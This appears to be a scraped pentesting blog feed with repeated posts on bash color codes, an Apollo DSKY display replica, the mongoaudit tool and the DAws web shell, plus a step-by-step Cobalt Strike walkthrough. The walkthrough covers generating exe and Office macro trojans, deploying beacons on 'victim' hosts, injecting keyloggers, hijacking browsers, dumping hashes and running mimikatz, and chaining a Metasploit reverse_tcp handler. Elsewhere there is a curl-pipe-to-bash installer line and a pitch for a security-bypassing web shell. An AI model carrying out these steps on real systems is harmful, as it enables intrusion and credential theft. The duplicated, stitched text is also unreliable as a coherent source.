Give the output of the bash shell with color – Penetration Testing in Linux

Write some scripts when the output of too much information, some important information with color tips will be more friendly.

Text color

For example, you want helloin on the console output is red, execute the following command

echo -e “\033[31mhello\033[0m”

\033[31m Indicates that the display color of the character is changed to red

\033[0m Indicates that the display color of the character is changed to normal

You can see \033[ and the last mare the same, there are differences is the middle number, this number represents the color to be displayed, the following meanings

30

black

31

red

32

green

33

light red

34

blue

35

purple

36

light blue

37

gray

Background color

The background color and the foreground color are the same, just use the numbers differently

40

black

41

red

42

green

43

light red

44

blue

45

purple

46

light blue

47

gray

If you need to set the foreground color and background color at the same time, for example, the output text color is red, the background color is green string, need to separate the two numbers by semicolon,

echo -e “\033[31;42mhello\033[0m”

The post Give the output of the bash shell with color appeared first on Penetration Testing in Linux. http://ift.tt/2rzDSCU http://ift.tt/2aM8QhC

Anúncios

Give the output of the bash shell with color – Penetration Testing in Linux

Write some scripts when the output of too much information, some important information with color tips will be more friendly.

Text color

For example, you want helloin on the console output is red, execute the following command

echo -e “\033[31mhello\033[0m”

\033[31m Indicates that the display color of the character is changed to red

\033[0m Indicates that the display color of the character is changed to normal

You can see \033[ and the last mare the same, there are differences is the middle number, this number represents the color to be displayed, the following meanings

30

black

31

red

32

green

33

light red

34

blue

35

purple

36

light blue

37

gray

Background color

The background color and the foreground color are the same, just use the numbers differently

40

black

41

red

42

green

43

light red

44

blue

45

purple

46

light blue

47

gray

If you need to set the foreground color and background color at the same time, for example, the output text color is red, the background color is green string, need to separate the two numbers by semicolon,

echo -e “\033[31;42mhello\033[0m”

The post Give the output of the bash shell with color appeared first on Penetration Testing in Linux. http://ift.tt/2rzDSCU http://ift.tt/2aM8QhC

Re-Creating the Apollo DSKY’s Display

Apollo astronauts used the DSKY (Display-Keyboard) to interact with the flight computer with a series of 2-digit codes punched into a numeric keypad. Above the keyboard was a high voltage electroluminescent (EL) display whose segments were driven by electromechanical relays; old-ass technology not seen in operation in decades.

[Fran Blanche] is working to re-create the DSKY’s display, and is raising funds to make her first prototype. She was actually able to go dismantle a real DSKY at the Smithsonian, and this drove her desire to re-create the DSKY’s unusual display.

As [Fran] points out in her video, cinematic re-creations typically involve LED displays and CGI rather than the authentic EL 7-segs. Who would want that when you could have the original?

The DSKY is one of the most recognizable and historically relevant parts of the Apollo Command Module and it’s also quite rare. There are only a handful of them around and of course none of them work. [Fran]’s display could help museums, collectors — and yes, moviemakers — re-create DSKYs with greater authenticity.

[Fran] is a good friend of Hackaday. If you missed her Hack Chat on antiquated technology last Friday you can check out the transcript here.

Filed under: chemistry hacks, classic hacks http://ift.tt/2quaCNS http://ift.tt/2aM8QhC

Re-Creating the Apollo DSKY’s Display

Apollo astronauts used the DSKY (Display-Keyboard) to interact with the flight computer with a series of 2-digit codes punched into a numeric keypad. Above the keyboard was a high voltage electroluminescent (EL) display whose segments were driven by electromechanical relays; old-ass technology not seen in operation in decades.

[Fran Blanche] is working to re-create the DSKY’s display, and is raising funds to make her first prototype. She was actually able to go dismantle a real DSKY at the Smithsonian, and this drove her desire to re-create the DSKY’s unusual display.

As [Fran] points out in her video, cinematic re-creations typically involve LED displays and CGI rather than the authentic EL 7-segs. Who would want that when you could have the original?

The DSKY is one of the most recognizable and historically relevant parts of the Apollo Command Module and it’s also quite rare. There are only a handful of them around and of course none of them work. [Fran]’s display could help museums, collectors — and yes, moviemakers — re-create DSKYs with greater authenticity.

[Fran] is a good friend of Hackaday. If you missed her Hack Chat on antiquated technology last Friday you can check out the transcript here.

Filed under: chemistry hacks, classic hacks http://ift.tt/2quaCNS http://ift.tt/2aM8QhC

Introduction Cobalt Strike,cobalt strike walkthrough

Introduction to Cobalt Strike

Cobalt Strike a metasploit-based GUI of the framework of penetration testing tools, integrated port forwarding, service scanning, automation overflow, multi-mode port monitoring, win exe Trojan generation, win dll Trojan generation, java Trojan generation, office macro virus Generation, Trojans tied; phishing attacks include: site cloning, target information access, java implementation, the browser automatically attack and so on. The Cobalt Strike 3.0 is no longer using the Metasploit framework as a standalone platform, and can be used in conjunction with Armitage.

Cobalt Strike Usage

1. Execute the command on the community server to run the server:

./teamserver 10.0.0.88 backlion // The server IP address is 10.0.0.88 and the password is backlion

2. Execute on customer service (can be connected):

On windows

Java -XX: + AggressiveHeap -XX: + UseParallelGC -jar cobaltstrike.jar $

On Linux:

./cobaltstrike

Hostname: 10.0.0.88 port: 50050 user name: any password: backlion

3. Create a local monitor listen:

Cobalt Strike-> Listeners, and then click Add to create your own Listeners, Cobalt Strike3.6 include

· windows/beacon_dns/reverse_dns_txt

· windows/beacon_dns/reverse_http

· windows/beacon_http/reverse_http

· windows/beacon_https/reverse_https

· windows/beacon_smb/bind_pipe

· windows/foreign/reverse_dns_txt

· windows/foreign/reverse_http

· windows/foreign/reverse_https

· windows/foreign/reverse_tcp

On windows/beacon * is Cobalt Strike comes with the module, including dns, http, https, smb four kinds of listeners, windows/foreign * for the external listener, that is, msf or Armitage listener. Select the listener after the host will automatically fill in the service when we open the ip, configure the listening port, and then save the listener.

4. Attack module introduction

Create a good listener, the following need to configure the client, Cobalt Strike includes a variety of attacks, including Packages include the following:

HTML Application generates malicious HTA Trojan files;

MS Office Macro generates office macro virus files;

Payload Generator generates payload for various language versions;

USB / CD AutoPlay Generates Trojan files that run with autoplay;

Windows Dropper bundles, able to bundle the document class;

Windows Executable generates executable exe Trojans;

Windows Executable (S) generates a stateless executable exe Trojan.

Web Drive-by includes the following modules:

Manage Manage open web services

Clone Site cloning site that can record the data submitted by the victim;

Host File provides a file download, you can modify the Mime information;

Scripted Web Delivery is similar to web_delivery msf;

Signed Applet Attack uses a java self-signed program for phishing attacks;

Smart Applet Attack automatically detects java version and attack, for Java 1.6.0_45 and Java 1.7.0_21;

System Profiler is used to get some system information, such as system version, Flash version, browser version and so on.

Spear Phish is a module for mailing.

5.View display module introduction

View module can facilitate the test to see the various modules, graphical interface can easily see the victims of the machine’s various information.

Applications show the application information of the victim machine;

Credentials shows the victim machine’s certificate information , can be more convenient for subsequent infiltration ;

Download Download the file

Event Log can see the event log, clearly see the system events, and the team can chat here;

Keystrokes View keyloggers ;

Proxy Pivots View proxy information ;

Screenshots screenshots function ;

Script Console where you can load a variety of enhancements to the script, the script address is cortana-script ;

Targets to see the target;

Web Log View web log.

6. Reporting the introduction of the report module

Activity report activity report generation

Hosts report host report

Indicators of Compromise target report

Sessions report Session report

Social Engineering Report

7.Beacon module used

7.0 Generate an exe backdoor

Attacks – packages – windows executable, can generate a windows exe back door, as shown below:

7.1 The generated backdoor artifact.exe is uploaded to the victim host to execute

In the Cobalt Strike will rebound in the target victim host shell, and then click on the victim’s machine in the

7.2 Click on the victim to rebound in the host of the interaction, and then you can enter into the beacon

7.3 shell command for beacon module **

Beacon> help shell

Beacon> shell ifconfig

Beacon> shell whoami

Beacon> shell net user

7.4 beacon browserpivot command

The user into the victim browser process, and then open the HTTP proxy, then you can log on the victims of the site

Beacon> ps // view the browser process, where the process is 2396

Beacon> browserpivot 2396 / / into the process, and open the http proxy, the proxy server: 10.0.0.88:62243

The local browser sets the http proxy, host: 10.0.0.88 The proxy type is: http port: 62243

Beacon> browserpivot stop // stop the agent

7.5 beacon module Socks command

Select the victim host, and then right Pivoting-> SOCKS Server, then use this computer to open socks proxy

Configure the proxychains configuration file under kali:

vim /etc/proxychains.conf

Change socks4 127.0.0.1 9050 to: socks4 127.0.0.1 26370

Proxychains firefox ESR // can access broiler intranet via sokcsk5 agent

Beacon> socks stop // close the scoks proxy

7.6 beacon module of the Screenshot & Keylogger

Beacon> screenshot // Run the screenshots command

And then open View-> Screenshots, you can see the screenshot

Beacon> ps / / view the system process, casually choose a process PID process

Beacon> keylogger 2640 // keyboard record injection process

Open View-> Keystrokes, you can see the keyboard record results

7.7 beacon module powershell-import command

Beacon> powershell-import // Import various powershell scripts, where you can import the nishang module

Beacon> powershell posershell_script_name

or

Beacon> powershell Check-VM

7.8 Cobalt Strike and msf linkage

1. Execute the following command under MSF:

msf> use exploit / multi / handler

msf exploit (handler)> set payload windows / meterpreter / reverse_tcp

msf exploit (handler)> set lhost 192.168.1.100

msf exploit (handler)> set lport 4444

msf exploit (handler)> exploit

2. In the implementation of the Cobalt Strike, first add a monitor command, the name is: msf payload Select: windows/foreign/reverse_tcp listening port: 4444

3. Select the victim host, then right-click Spawn

4. In msf can be a rebound under the meterpreter session:

7.9 beacon password module

Beacon> sleep 0 // show the results quickly

Beacon> wdigest // read the information

Beacon> hashdump // read account hash password value, need to know permissions, right click victim host –access-hashdump

Beacon> logonpasswords // run mimikatz, right click victim host – illustrated RUN mimikatz

Cobalt Strike Summary

Cobalt Strike features exceptionally powerful, and MSF graphical interface, more intuitive operation, more convenient for automated attacks, you have to help in the penetration test

The post Introduction to Cobalt Strike appeared first on Penetration Testing in Linux. http://ift.tt/2qtKL8E http://ift.tt/2aM8QhC

MongoDB auditing pentesting,penetration testing,mongodb penetration testing

mongoaudit is a CLI tool for auditing MongoDB servers, detecting poor security settings and performing automated penetration testing.

It is widely known that there are quite a few holes in MongoDB’s default configuration settings. This fact, combined with abundant lazy system administrators and developers, has led to what the press has called the MongoDB apocalypse.

mongoaudit not only detects misconfigurations, known vulnerabilities and bugs but also gives you advice on how to fix them, recommends best practices and teaches you how to DevOp like a pro!

Supported tests

Server only accepts connections from whitelisted hosts / networks

MongoDB HTTP status interface is not accessible on port 28017

MongoDB is not exposing its version number

MongoDB version is newer than 2.4

TLS/SSL encryption is enabled

Authentication is enabled

SCRAM-SHA-1 authentication method is enabled

Server-side Javascript is forbidden *

Roles granted to the user only permit CRUD operations *

MongoDB listens on a port different to default one

The user has permissions over a single database *

Security bug CVE-2015-7882

Security bug CVE-2015-2705

Security bug CVE-2014-8964

Security bug CVE-2015-1609

Security bug CVE-2014-3971

Security bug CVE-2014-2917

Security bug CVE-2013-4650

Security bug CVE-2013-3969

Security bug CVE-2012-6619

Security bug CVE-2013-1892

Security bug CVE-2013-2132

Installation

Installing with pip:
pip install mongoaudit

Alternative installer
curl -s http://ift.tt/2l037ax | bash

Source

http://ift.tt/2kukY9n

The post mongoaudit | powerful MongoDB auditing and pentesting tool appeared first on Penetration Testing in Linux. http://ift.tt/2relBrQ http://ift.tt/2aM8QhC

DAws: Advanced Web Shell,php webshell access,php web shell github,php webshell generic backdoor

There’s multiple things that makes DAws better than every Web Shell out there:

Bypasses Security Systems(IPS, WAFs,etc) like Suhosin(uses up to 20 php functions just to get a command executed).

Drops CGI Shells and communicate with them to bypass Security Systems.

Uses the SSH Authorized Keys method to bypass Security Systems.

Uses Shellshock in 2 methods to bypass Security Systems.

Is completely Post Based and uses a XOR Encryption based on a random key that gets generated with every new session + private base64 functions to bypass Security Systems.

Supports Windows and Linux.

Finds a writeable and readable directory and moves there if it’s a web directory; DAws will output everything in that found directory.

Drops a php.ini and a .htaccess file that clears all disablers incase “suphp” was installed.

Has an advanced File Manager.

Everything is done automatically so there’s nothing for the user to worry about.

Open Source.

and much more (check the source for more information; everything is well commented)

Download

The post DAws: Advanced Web Shell appeared first on Penetration Testing in Linux. http://ift.tt/2qtTYhq http://ift.tt/2aM8QhC